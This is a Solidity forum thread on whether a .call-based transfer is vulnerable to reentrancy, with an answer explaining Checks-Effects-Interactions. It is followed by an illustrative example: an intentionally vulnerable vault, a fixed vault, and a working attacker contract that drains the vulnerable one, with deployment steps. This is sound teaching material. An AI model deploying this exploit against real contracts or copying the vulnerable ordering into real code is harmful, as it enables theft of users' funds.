Solidity


Serpent0x
May 31, 2024
Discussion

Reentrancy Vulnerability

Hello everyone, I've noticed that the offer function uses the .call{value: amount}("") method to send Ether to the recipient's address.

Could anyone provide insight into whether this function is indeed vulnerable to reentrancy and suggest any best practices or modifications to mitigate such risks?

pragma solidity ^0.8.20;

contract Offer {
    uint256 public balance;
    // Error signature inferred from the revert below; parameter names are assumed.
    error TransferFailed(address token, address from, address to, uint256 amount);

    function _offer(address to, uint256 amount) internal {
        // Effect first: state is updated before the external call.
        balance -= amount;
        // Interaction last: the recipient may run arbitrary code here.
        (bool success, ) = to.call{value: amount}("");
        if (!success) {
            revert TransferFailed(address(0), address(this), to, amount);
        }
    }
}
  • Smart Contract
  • Solidity
  • Solidity Compiler

Answers
0x0304...a958
Aug 11 2024, 15:15

One of the best practices in Solidity is CEI (Checks, Effects, Interactions). It describes the order in which your code is structured to avoid unexpected behaviour or malicious execution.

Checks would be implementing some require statements to be sure the parameters in your function are correct. There aren't any in your _offer() function, but you could add, for example, require(balance >= amount); (not necessary) at the beginning of your function to be sure that the user doesn't spend more than what he owns.

Effects are basically changing the state variables of your contract in order to suit what you want it to be now. Here, it's the line balance -= amount;, reducing the user's balance.

Interactions are calls to other contracts/addresses that might trigger some unknown code (for example, when you call to send money, it might trigger a receive() function of the smart contract calling your function).

Because you follow this rule in this code, no re-entrancy should be possible.

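An added example, not code from the question or the answer above, showing what the CEI order actually buys you: a vault whose withdraw() performs the external call before it updates state, the same vault rewritten in Checks-Effects-Interactions order, and an attacker contract that re-enters withdraw() from its receive() function. The contract names (VulnerableVault, SafeVault, Attacker), the 1 ether stake and the helper loot() are my own choices for the demonstration.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Example code added for illustration; not from the original question or answer.
// Contract and function names (VulnerableVault, SafeVault, Attacker) are assumed.

// Interaction before effect: when the recipient's receive() re-enters
// withdraw(), balances[msg.sender] has not been reduced yet, so the check
// passes again and the vault pays out once per nested call.
contract VulnerableVault {
    mapping(address => uint256) public balances;

    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    function withdraw(uint256 amount) external {
        require(balances[msg.sender] >= amount, "insufficient balance"); // Check
        (bool ok, ) = msg.sender.call{value: amount}("");                 // Interaction
        require(ok, "transfer failed");
        // Effect comes last. `unchecked` reproduces pre-0.8 semantics: with
        // checked arithmetic the repeated decrement would underflow while the
        // nested calls unwind and revert the whole transaction, which masks this
        // particular exploit without fixing the ordering.
        unchecked {
            balances[msg.sender] -= amount;                               // Effect (too late)
        }
    }
}

// Checks, Effects, Interactions: the balance is reduced before the external
// call, so a re-entrant withdraw() fails the check and reverts.
contract SafeVault {
    mapping(address => uint256) public balances;

    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    function withdraw(uint256 amount) external {
        require(balances[msg.sender] >= amount, "insufficient balance"); // Check
        balances[msg.sender] -= amount;                                   // Effect
        (bool ok, ) = msg.sender.call{value: amount}("");                 // Interaction
        require(ok, "transfer failed");
    }
}

interface IVault {
    function deposit() external payable;
    function withdraw(uint256 amount) external;
}

// Deposits 1 ether, then re-enters withdraw() from receive() while the vault
// still holds at least 1 ether. Against VulnerableVault this drains the
// vault; against SafeVault the nested withdraw() reverts, the revert bubbles
// up through the failed call, and attack() reverts as a whole.
contract Attacker {
    IVault public immutable vault;
    uint256 public constant STAKE = 1 ether;

    constructor(address vault_) {
        vault = IVault(vault_);
    }

    function attack() external payable {
        require(msg.value == STAKE, "send exactly 1 ether");
        vault.deposit{value: STAKE}();
        vault.withdraw(STAKE);
    }

    receive() external payable {
        if (address(vault).balance >= STAKE) {
            vault.withdraw(STAKE);
        }
    }

    // Ether collected by the attack, for inspection after the transaction.
    function loot() external view returns (uint256) {
        return address(this).balance;
    }
}
```

To try it, deploy either vault, fund it with a few ether from another account, deploy Attacker with the vault's address and call attack() with exactly 1 ether: the vulnerable vault ends with (almost) nothing and loot() reports the drained amount, while against SafeVault the transaction reverts with "transfer failed" and both balances are unchanged. CEI protects a single function; where one function's external call can reach a different function that reads the same state, a reentrancy guard (a mutex such as OpenZeppelin's ReentrancyGuard) is the usual additional defense.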
